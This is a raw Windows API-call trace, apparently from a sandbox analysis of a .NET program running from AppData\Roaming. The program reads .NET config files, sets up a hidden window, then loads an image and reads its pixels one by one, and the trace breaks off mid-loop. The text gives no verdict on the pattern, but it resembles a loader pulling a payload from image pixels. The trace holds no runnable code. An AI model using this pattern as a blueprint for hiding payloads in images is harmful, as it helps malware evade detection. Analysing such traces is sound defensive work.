0x3a [0081.270] GetCurrentProcess () returned 0xffffffff [0081.270] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1eeff4 | out: TokenHandle=0x1eeff4*=0x1f0) returned 1 [0081.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1eeaac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0081.395] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1eefec | out: lpFileInformation=0x1eefec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0081.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1eea78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0081.397] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1eeff4 | out: lpFileInformation=0x1eeff4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0081.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1eea14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0081.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1eef2c) returned 1 [0081.402] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40 [0081.402] GetFileType (hFile=0x40) returned 0x1 [0081.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1eef28) returned 1 [0081.402] GetFileType (hFile=0x40) returned 0x1 [0081.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1ee268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0081.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1ee2cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0081.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1ee50c) returned 1 [0081.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1ee7d0 | out: lpFileInformation=0x1ee7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0081.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1ee508) returned 1 [0081.734] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x1ee69c | out: pfEnabled=0x1ee69c) returned 0x0 [0082.201] GetFileSize (in: hFile=0x40, lpFileSizeHigh=0x1eefe8 | out: lpFileSizeHigh=0x1eefe8*=0x0) returned 0x8c8e [0082.202] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eefa4, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eefa4*=0x1000, lpOverlapped=0x0) returned 1 [0082.242] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eee54, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eee54*=0x1000, lpOverlapped=0x0) returned 1 [0082.245] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eed08, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eed08*=0x1000, lpOverlapped=0x0) returned 1 [0082.246] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eed08, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eed08*=0x1000, lpOverlapped=0x0) returned 1 [0082.246] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eed08, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eed08*=0x1000, lpOverlapped=0x0) returned 1 [0082.252] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eec40, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eec40*=0x1000, lpOverlapped=0x0) returned 1 [0082.259] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eedac, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eedac*=0x1000, lpOverlapped=0x0) returned 1 [0082.261] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eeca0, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eeca0*=0x1000, lpOverlapped=0x0) returned 1 [0082.261] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eeca0, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eeca0*=0xc8e, lpOverlapped=0x0) returned 1 [0082.262] ReadFile (in: hFile=0x40, lpBuffer=0x271ff2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1eed64, lpOverlapped=0x0 | out: lpBuffer=0x271ff2c*, lpNumberOfBytesRead=0x1eed64*=0x0, lpOverlapped=0x0) returned 1 [0082.262] CloseHandle (hObject=0x40) returned 1 [0082.262] CloseHandle (hObject=0x1f0) returned 1 [0082.263] GetCurrentProcess () returned 0xffffffff [0082.269] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ef140 | out: TokenHandle=0x1ef140*=0x1f0) returned 1 [0082.269] CloseHandle (hObject=0x1f0) returned 1 [0082.270] GetCurrentProcess () returned 0xffffffff [0082.270] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ef140 | out: TokenHandle=0x1ef140*=0x1f0) returned 1 [0082.271] CloseHandle (hObject=0x1f0) returned 1 [0082.280] GetCurrentProcess () returned 0xffffffff [0082.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1eeff4 | out: TokenHandle=0x1eeff4*=0x1f0) returned 1 [0082.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1eefec | out: lpFileInformation=0x1eefec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0082.281] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config", nBufferLength=0x105, lpBuffer=0x1eea78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config", lpFilePart=0x0) returned 0x3a [0082.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1eeff4 | out: lpFileInformation=0x1eeff4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0082.282] CloseHandle (hObject=0x1f0) returned 1 [0082.282] GetCurrentProcess () returned 0xffffffff [0082.282] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ef140 | out: TokenHandle=0x1ef140*=0x1f0) returned 1 [0082.283] CloseHandle (hObject=0x1f0) returned 1 [0082.284] GetCurrentProcess () returned 0xffffffff [0082.285] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ef140 | out: TokenHandle=0x1ef140*=0x1f0) returned 1 [0082.285] CloseHandle (hObject=0x1f0) returned 1 [0082.336] GetCurrentProcess () returned 0xffffffff [0082.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1eef58 | out: TokenHandle=0x1eef58*=0x1f0) returned 1 [0082.346] CloseHandle (hObject=0x1f0) returned 1 [0082.347] GetCurrentProcess () returned 0xffffffff [0082.347] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1eef70 | out: TokenHandle=0x1eef70*=0x1f0) returned 1 [0082.357] CloseHandle (hObject=0x1f0) returned 1 [0082.365] GetSystemMetrics (nIndex=75) returned 1 [0082.391] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0082.413] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772b0000 [0082.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x1ef23c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15 [0082.417] GetProcAddress (hModule=0x772b0000, lpProcName="AddDllDirectory") returned 0x773f1e91 [0082.417] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x62090000 [0082.443] AdjustWindowRectEx (in: lpRect=0x1ef3a4, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x1ef3a4) returned 1 [0082.457] GetCurrentProcess () returned 0xffffffff [0082.457] GetCurrentThread () returned 0xfffffffe [0082.457] GetCurrentProcess () returned 0xffffffff [0082.457] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1ef2bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1ef2bc*=0x40) returned 1 [0082.460] GetCurrentThreadId () returned 0xe28 [0082.498] GetCurrentActCtx (in: lphActCtx=0x1ef21c | out: lphActCtx=0x1ef21c*=0x0) returned 1 [0082.498] ActivateActCtx (in: hActCtx=0x4272c4, lpCookie=0x1ef22c | out: hActCtx=0x4272c4, lpCookie=0x1ef22c) returned 1 [0082.501] GetModuleHandleW (lpModuleName="user32.dll") returned 0x766d0000 [0082.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x1ef0d4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWLcLñ½ÃDþ-f¨õ\x1e", lpUsedDefaultChar=0x0) returned 14 [0082.501] GetProcAddress (hModule=0x766d0000, lpProcName="DefWindowProcW") returned 0x778f25dd [0082.502] GetStockObject (i=5) returned 0x1900015 [0082.506] GetModuleHandleW (lpModuleName=0x0) returned 0x1250000 [0082.509] CoTaskMemAlloc (cb=0x5c) returned 0x435508 [0082.509] RegisterClassW (lpWndClass=0x1ef0c4) returned 0xc21d [0082.510] CoTaskMemFree (pv=0x435508) [0082.510] GetModuleHandleW (lpModuleName=0x0) returned 0x1250000 [0082.511] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x1250000, lpParam=0x0) returned 0x10348 [0082.511] SetWindowLongW (hWnd=0x10348, nIndex=-4, dwNewLong=2005870045) returned 17369302 [0082.518] GetWindowLongW (hWnd=0x10348, nIndex=-4) returned 2005870045 [0082.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ee9d8 | out: phkResult=0x1ee9d8*=0x230) returned 0x0 [0082.529] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x1ee9f8, lpData=0x0, lpcbData=0x1ee9f4*=0x0 | out: lpType=0x1ee9f8*=0x0, lpData=0x0, lpcbData=0x1ee9f4*=0x0) returned 0x2 [0082.530] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x1ee9f8, lpData=0x0, lpcbData=0x1ee9f4*=0x0 | out: lpType=0x1ee9f8*=0x0, lpData=0x0, lpcbData=0x1ee9f4*=0x0) returned 0x2 [0082.530] RegCloseKey (hKey=0x230) returned 0x0 [0082.533] SetWindowLongW (hWnd=0x10348, nIndex=-4, dwNewLong=17369342) returned 2005870045 [0082.533] GetWindowLongW (hWnd=0x10348, nIndex=-4) returned 17369342 [0082.533] GetWindowLongW (hWnd=0x10348, nIndex=-16) returned 113311744 [0082.535] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc21e [0082.535] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x10348, Msg=0x24, wParam=0x0, lParam=0x1eecb0) returned 0x0 [0082.535] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc21f [0082.535] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x10348, Msg=0x81, wParam=0x0, lParam=0x1eeca4) returned 0x1 [0082.536] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x10348, Msg=0x83, wParam=0x0, lParam=0x1eec90) returned 0x0 [0082.536] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x10348, Msg=0x1, wParam=0x0, lParam=0x1eeca4) returned 0x0 [0082.536] GetClientRect (in: hWnd=0x10348, lpRect=0x1eea0c | out: lpRect=0x1eea0c) returned 1 [0082.537] GetWindowRect (in: hWnd=0x10348, lpRect=0x1eea0c | out: lpRect=0x1eea0c) returned 1 [0082.538] GetParent (hWnd=0x10348) returned 0x0 [0082.538] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1bc40001) returned 1 [0082.655] AdjustWindowRectEx (in: lpRect=0x1ef348, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x1ef348) returned 1 [0118.016] EtwEventRegister () returned 0x0 [0118.029] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config", nBufferLength=0x105, lpBuffer=0x1ee648, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config", lpFilePart=0x0) returned 0x3a [0118.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1ee890) returned 1 [0118.029] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1eeb54 | out: lpFileInformation=0x1eeb54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0118.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1ee88c) returned 1 [0118.912] GdiplusStartup (in: token=0x276198, input=0x1edcc8, output=0x1edd18 | out: token=0x276198, output=0x1edd18) returned 0x0 [0118.929] GdipLoadImageFromStream (stream=0x4e0030, image=0x1ee7b0) returned 0x0 [0119.159] GdipImageForceValidation (image=0x52d2230) returned 0x0 [0119.170] GdipGetImageType (image=0x52d2230, type=0x1ee7ac) returned 0x0 [0119.171] GdipGetImageRawFormat (image=0x52d2230, format=0x1ee720*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0119.201] GdipGetImageWidth (image=0x52d2230, width=0x1eed34) returned 0x0 [0119.211] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.212] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.212] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=0, color=0x1eed00) returned 0x0 [0119.224] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.224] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.224] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=1, color=0x1eed00) returned 0x0 [0119.224] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.224] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.224] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=2, color=0x1eed00) returned 0x0 [0119.225] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.225] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.225] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=3, color=0x1eed00) returned 0x0 [0119.225] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.225] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.225] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=4, color=0x1eed00) returned 0x0 [0119.225] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.225] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.225] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=5, color=0x1eed00) returned 0x0 [0119.225] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.225] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.225] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=6, color=0x1eed00) returned 0x0 [0119.225] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.225] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.225] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=7, color=0x1eed00) returned 0x0 [0119.226] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.226] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.226] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=8, color=0x1eed00) returned 0x0 [0119.226] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.226] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.226] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=9, color=0x1eed00) returned 0x0 [0119.226] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.226] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.226] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=10, color=0x1eed00) returned 0x0 [0119.226] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.226] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.226] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=11, color=0x1eed00) returned 0x0 [0119.226] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.226] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.226] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=12, color=0x1eed00) returned 0x0 [0119.227] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.227] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.227] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=13, color=0x1eed00) returned 0x0 [0119.227] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.227] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.227] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=14, color=0x1eed00) returned 0x0 [0119.227] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.227] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.227] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=15, color=0x1eed00) returned 0x0 [0119.227] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.227] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.227] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=16, color=0x1eed00) returned 0x0 [0119.227] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.227] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.227] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=17, color=0x1eed00) returned 0x0 [0119.228] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.228] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.228] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=18, color=0x1eed00) returned 0x0 [0119.228] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.228] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.228] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=19, color=0x1eed00) returned 0x0 [0119.228] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.228] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.228] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=20, color=0x1eed00) returned 0x0 [0119.228] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.228] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.228] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=21, color=0x1eed00) returned 0x0 [0119.228] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.228] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.228] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=22, color=0x1eed00) returned 0x0 [0119.229] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.229] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.229] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=23, color=0x1eed00) returned 0x0 [0119.229] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.229] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.229] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=24, color=0x1eed00) returned 0x0 [0119.229] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.229] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.229] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=25, color=0x1eed00) returned 0x0 [0119.229] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.229] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.229] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=26, color=0x1eed00) returned 0x0 [0119.229] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.229] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.229] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=27, color=0x1eed00) returned 0x0 [0119.229] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.230] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.230] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=28, color=0x1eed00) returned 0x0 [0119.230] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.230] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.230] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=29, color=0x1eed00) returned 0x0 [0119.230] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.230] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.230] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=30, color=0x1eed00) returned 0x0 [0119.230] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.230] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.230] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=31, color=0x1eed00) returned 0x0 [0119.230] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.230] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.230] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=32, color=0x1eed00) returned 0x0 [0119.230] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.230] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.231] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=33, color=0x1eed00) returned 0x0 [0119.231] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.231] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.231] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=34, color=0x1eed00) returned 0x0 [0119.231] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.231] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.231] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=35, color=0x1eed00) returned 0x0 [0119.231] 